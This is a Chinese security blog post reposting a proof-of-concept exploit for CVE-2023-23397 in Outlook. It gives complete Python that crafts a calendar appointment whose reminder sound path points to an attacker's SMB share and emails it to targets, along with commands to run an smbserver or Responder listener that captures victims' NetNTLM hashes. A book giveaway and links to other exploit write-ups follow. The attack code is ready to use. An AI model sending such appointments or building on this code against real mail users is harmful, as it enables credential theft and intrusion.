制作了一个简单的 PoC 电子邮件生成器和发件人,具有恶意提醒功能(只是一条消息,无需使用任务或 Cal.Ev.)。
https://github.com/Trackflaw/CVE-2023-23397/blob/main/poc.gif
In one session :
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
In a second session (smbserver
or responder
as you want).
smbserver.py -smb2support SHARE .
import smtplib, datetime, argparse
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.utils import COMMASPACE, formatdate
from independentsoft.msg import Message
# Mail configuration : change it !
smtp_server = "mail.example.com"
smtp_port = 587
sender_email = "[email protected]"
sender_password = "[email protected]"
recipients_email = ["[email protected]"]
class Email:
def __init__(self, smtp_server, port, username, password, recipient):
self.smtp_server = smtp_server
self.port = port
self.username = username
self.password = password
self.recipient = recipient
def send(self, subject, body, attachment_path):
msg = MIMEMultipart()
msg['From'] = self.username
msg['To'] = COMMASPACE.join(self.recipient)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach(MIMEText(body))
with open(attachment_path, 'rb') as f:
part = MIMEApplication(f.read(), Name=attachment_path)
part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'
msg.attach(part)
try:
server = smtplib.SMTP(self.smtp_server, self.port)
server.starttls()
server.login(self.username, self.password)
server.sendmail(self.username, self.recipient, msg.as_string())
server.quit()
print("[+] Malicious appointment sent !")
except Exception as e:
print("[-] Error with SMTP server...", e)
parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')
parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)
args = parser.parse_args()
appointment = Message()
appointment.message_class = "IPM.Appointment"
appointment.subject = "CVE-2023-23397"
appointment.body = "New meeting now !"
appointment.location = "Paris"
appointment.appointment_start_time = datetime.datetime.now()
appointment.appointment_end_time = datetime.datetime.now()
appointment.reminder_override_default = True
appointment.reminder_sound_file = args.path
appointment.save("appointment.msg")
email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)
subject = "Hello There !"
body = "Important appointment !"
email.send(subject, body, "appointment.msg")
文章来源:Khan安全攻防实验室
【抽奖彩蛋】
参与规则如下:
①、把文章分享到朋友圈不分组(作为兑奖凭证)
②、点击下方名片发送「暗号」,即可参与抽奖(两本书籍二选一)
③、 2023 年 4月 1 日 12:00 自动开奖
④、请中奖的同学在24小时内填写联系小编进行验证。超过24小时未联系的(中奖了但是未满足条件①的)均视为自动放弃!
《物联网安全漏洞挖掘实战》:本书源自作者多年在物联网安全领域中的经验积累,从实战的角度对物联网领域的漏洞挖掘技术进行了介绍,对物联网中存在的安全隐患进行了全面细致的剖析。
本书所选案例均来自真实的应用环境,实用性与可操作性强,更贴近物联网安全的研究与学习。对于物联网安全研究人员、固件应用开发人员以及对相关专业的学生来说,都可以通过本书对掌握物联网漏洞的挖掘与防范技能。
本书主要内容包括:物联网概述、物联网设备硬件分析、物联网固件分析、物联网漏洞利用、物联网协议安全。
链接地址:
https://item.m.jd.com/product/13616401.html
《物联网信息安全技术》:电信技术专家朱中梁院士作序推荐,电子科技大学(成都)张小松教授团队编写,从攻防角度系统介绍loT安全的相关知识、原理技术,并针对智能家居、智能汽车、智能穿戴设备等典型应用场景,分析其中存在的安全风险 。本书可作为计算机、网络通信、信息安全、软件工程等相关专业的参考用书,也可作为物联网及安全行业从业者、对信息安全感兴趣的读者的自学读物。
【往期推荐】
【超详细 | Python】CS免杀-Shellcode Loader原理(python)
【超详细 | 钟馗之眼】ZoomEye-python命令行的使用
【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞
【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
一如既往的学习,一如既往的整理,一如即往的分享
仅用于学习交流,不得用于非法用途
如侵权请私聊公众号删文